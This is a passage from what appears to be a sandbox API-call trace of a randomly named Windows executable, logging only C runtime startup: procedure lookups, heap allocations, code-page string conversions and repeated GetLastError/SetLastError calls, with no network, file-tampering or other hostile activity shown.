lpProcName="FlsSetValue") returned 0x76d44208 [0109.576] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0109.576] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0109.576] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0109.576] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0109.576] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0109.577] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0109.577] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0109.577] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0109.577] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0109.577] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0109.577] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0109.577] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0109.577] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0109.577] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0109.577] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0109.578] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0109.578] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0109.578] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x214) returned 0x49207d0 [0109.578] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0109.578] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0109.578] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0109.579] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0109.579] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0109.579] GetCurrentThreadId () returned 0x324 [0109.579] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0109.579] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x800) returned 0x49209f0 [0109.579] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0109.579] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0109.579] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0109.579] SetHandleCount (uNumber=0x20) returned 0x20 [0109.579] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe\" --Admin IsNotAutoStart IsNotTask" [0109.579] GetEnvironmentStringsW () returned 0x4983ea0* [0109.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0109.579] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x0, Size=0x565) returned 0x49211f8 [0109.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x49211f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0109.580] FreeEnvironmentStringsW (penv=0x4983ea0) returned 1 [0109.580] GetLastError () returned 0x0 [0109.580] SetLastError (dwErrCode=0x0) [0109.580] GetLastError () returned 0x0 [0109.580] SetLastError (dwErrCode=0x0) [0109.580] GetLastError () returned 0x0 [0109.580] SetLastError (dwErrCode=0x0) [0109.580] GetACP () returned 0x4e4 [0109.580] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x0, Size=0x220) returned 0x4921768 [0109.580] GetLastError () returned 0x0 [0109.580] SetLastError (dwErrCode=0x0) [0109.580] IsValidCodePage (CodePage=0x4e4) returned 1 [0109.580] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0109.580] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0109.580] GetLastError () returned 0x0 [0109.580] SetLastError (dwErrCode=0x0) [0109.580] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0109.580] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0109.581] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0109.581] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0109.581] GetLastError () returned 0x0 [0109.581] SetLastError (dwErrCode=0x0) [0109.581] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0109.581] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0109.581] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ혧衂㣓AĀ") returned 256 [0109.581] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ혧衂㣓AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0109.581] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ혧衂㣓AĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0109.581] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x95n%\x83\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0109.581] GetLastError () returned 0x0 [0109.581] SetLastError (dwErrCode=0x0) [0109.581] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0109.581] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ혧衂㣓AĀ") returned 256 [0109.581] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ혧衂㣓AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0109.581] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ혧衂㣓AĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0109.581] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x95n%\x83\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0109.581] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4b78e0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oqrosnesyxcditex.exe")) returned 0x3a [0109.581] GetLastError () returned 0x0 [0109.581] SetLastError (dwErrCode=0x0) [0109.581] GetLastError () returned 0x0 [0109.581] SetLastError (dwErrCode=0x0) [0109.581] GetLastError () returned 0x0 [0109.582] SetLastError (dwErrCode=0x0) [0109.582] GetLastError () returned 0x0 [0109.582] SetLastError (dwErrCode=0x0) [0109.582] GetLastError () returned 0x0 [0109.582] SetLastError (dwErrCode=0x0) [0109.582] GetLastError () returned 0x0 [0109.582] SetLastError (dwErrCode=0x0) [0109.582] GetLastError () returned 0x0 [0109.582] SetLastError (dwErrCode=0x0) [0109.582] GetLastError () returned 0x0 [0109.582] SetLastError (dwErrCode=0x0) [0109.582] GetLastError () returned 0x0 [0109.582] SetLastError (dwErrCode=0x0) [0109.582] GetLastError () returned 0x0 [0109.582] SetLastError (dwErrCode=0x0) [0109.582] GetLastError () returned 0x0 [0109.582] SetLastError (dwErrCode=0x0) [0109.582] GetLastError () returned 0x0 [0109.582] SetLastError (dwErrCode=0x0) [0109.582] GetLastError () returned 0x0 [0109.582] SetLastError (dwErrCode=0x0) [0109.582] GetLastError () returned 0x0 [0109.582] SetLastError (dwErrCode=0x0) [0109.583] GetLastError () returned 0x0 [0109.583] SetLastError (dwErrCode=0x0) [0109.583] GetLastError () returned 0x0 [0109.583] SetLastError (dwErrCode=0x0) [0109.583] GetLastError () returned 0x0 [0109.583] SetLastError (dwErrCode=0x0) [0109.583] GetLastError () returned 0x0 [0109.583] SetLastError (dwErrCode=0x0) [0109.583] GetLastError () returned 0x0 [0109.583] SetLastError (dwErrCode=0x0) [0109.583] GetLastError () returned 0x0 [0109.583] SetLastError (dwErrCode=0x0) [0109.583] GetLastError () returned 0x0 [0109.583] SetLastError (dwErrCode=0x0) [0109.583] GetLastError () returned 0x0 [0109.583] SetLastError (dwErrCode=0x0) [0109.583] GetLastError () returned 0x0 [0109.583] SetLastError (dwErrCode=0x0) [0109.583] GetLastError () returned 0x0 [0109.583] SetLastError (dwErrCode=0x0) [0109.583] GetLastError () returned 0x0 [0109.583] SetLastError (dwErrCode=0x0) [0109.583] GetLastError () returned 0x0 [0109.584] SetLastError (dwErrCode=0x0) [0109.584] GetLastError () returned 0x0 [0109.584] SetLastError (dwErrCode=0x0) [0109.584] GetLastError () returned 0x0 [0109.584] SetLastError (dwErrCode=0x0) [0109.584] GetLastError () returned 0x0 [0109.584] SetLastError (dwErrCode=0x0) [0109.584] GetLastError () returned 0x0 [0109.584] SetLastError (dwErrCode=0x0) [0109.584] GetLastError () returned 0x0 [0109.584] SetLastError (dwErrCode=0x0) [0109.584] GetLastError () returned 0x0 [0109.584] SetLastError (dwErrCode=0x0) [0109.584] GetLastError () returned 0x0 [0109.584] SetLastError (dwErrCode=0x0) [0109.584] GetLastError () returned 0x0 [0109.584] SetLastError (dwErrCode=0x0) [0109.584] GetLastError () returned 0x0 [0109.584] SetLastError (dwErrCode=0x0) [0109.584] GetLastError () returned 0x0 [0109.584] SetLastError (dwErrCode=0x0) [0109.584] GetLastError () returned 0x0 [0109.584] SetLastError (dwErrCode=0x0) [0109.584] GetLastError () returned 0x0 [0109.585] SetLastError (dwErrCode=0x0) [0109.585] GetLastError () returned 0x0 [0109.585] SetLastError (dwErrCode=0x0) [0109.585] GetLastError () returned 0x0 [0109.585] SetLastError (dwErrCode=0x0) [0109.585] GetLastError () returned 0x0 [0109.585] SetLastError (dwErrCode=0x0) [0109.585] GetLastError () returned 0x0 [0109.585] SetLastError (dwErrCode=0x0) [0109.585] GetLastError () returned 0x0 [0109.585] SetLastError (dwErrCode=0x0) [0109.585] GetLastError () returned 0x0 [0109.585] SetLastError (dwErrCode=0x0) [0109.585] GetLastError () returned 0x0 [0109.585] SetLastError (dwErrCode=0x0) [0109.585] GetLastError () returned 0x0 [0109.585] SetLastError (dwErrCode=0x0) [0109.585] GetLastError () returned 0x0 [0109.585] SetLastError (dwErrCode=0x0) [0109.585] GetLastError () returned 0x0 [0109.585] SetLastError (dwErrCode=0x0) [0109.585] GetLastError () returned 0x0 [0109.585] SetLastError (dwErrCode=0x0) [0109.585] GetLastError () returned 0x0 [0109.585] SetLastError (dwErrCode=0x0) [0109.586] GetLastError () returned 0x0 [0109.586] SetLastError (dwErrCode=0x0) [0109.586] GetLastError () returned 0x0 [0109.586] SetLastError (dwErrCode=0x0) [0109.586] GetLastError () returned 0x0 [0109.586] SetLastError (dwErrCode=0x0) [0109.586] GetLastError () returned 0x0 [0109.586] SetLastError (dwErrCode=0x0) [0109.586] GetLastError () returned 0x0 [0109.586] SetLastError (dwErrCode=0x0) [0109.586] GetLastError () returned 0x0 [0109.586] SetLastError (dwErrCode=0x0) [0109.586] GetLastError () returned 0x0 [0109.586] SetLastError (dwErrCode=0x0) [0109.586] GetLastError () returned 0x0 [0109.586] SetLastError (dwErrCode=0x0) [0109.586] GetLastError () returned 0x0 [0109.586] SetLastError (dwErrCode=0x0) [0109.586] GetLastError () returned 0x0 [0109.586] SetLastError (dwErrCode=0x0) [0109.586] GetLastError () returned 0x0 [0109.586] SetLastError (dwErrCode=0x0) [0109.586] GetLastError () returned 0x0 [0109.586] SetLastError (dwErrCode=0x0) [0109.586] GetLastError () returned 0x0 [0109.587] SetLastError (dwErrCode=0x0) [0109.587] GetLastError () returned 0x0 [0109.587] SetLastError (dwErrCode=0x0) [0109.587] GetLastError () returned 0x0 [0109.587] SetLastError (dwErrCode=0x0) [0109.587] GetLastError () returned 0x0 [0109.587] SetLastError (dwErrCode=0x0) [0109.587] GetLastError () returned 0x0 [0109.587] SetLastError (dwErrCode=0x0) [0109.587] GetLastError () returned 0x0 [0109.587] SetLastError (dwErrCode=0x0) [0109.587] GetLastError () returned 0x0 [0109.587] SetLastError (dwErrCode=0x0) [0109.587] GetLastError () returned 0x0 [0109.587] SetLastError (dwErrCode=0x0) [0109.587] GetLastError () returned 0x0 [0109.587] SetLastError (dwErrCode=0x0) [0109.587] GetLastError () returned 0x0 [0109.587] SetLastError (dwErrCode=0x0) [0109.587] GetLastError () returned 0x0 [0109.587] SetLastError (dwErrCode=0x0) [0109.587] GetLastError () returned 0x0 [0109.587] SetLastError (dwErrCode=0x0) [0109.588] GetLastError () returned 0x0 [0109.588] SetLastError (dwErrCode=0x0) [0109.588] GetLastError () returned 0x0 [0109.588] SetLastError (dwErrCode=0x0) [0109.588] GetLastError () returned 0x0 [0109.588] SetLastError (dwErrCode=0x0) [0109.588] GetLastError () returned 0x0 [0109.588] SetLastError (dwErrCode=0x0) [0109.588] GetLastError () returned 0x0 [0109.588] SetLastError (dwErrCode=0x0) [0109.588] GetLastError () returned 0x0 [0109.588] SetLastError (dwErrCode=0x0) [0109.588] GetLastError () returned 0x0 [0109.588] SetLastError (dwErrCode=0x0) [0109.588] GetLastError () returned 0x0 [0109.588] SetLastError (dwErrCode=0x0) [0109.588] GetLastError () returned 0x0 [0109.588] SetLastError (dwErrCode=0x0) 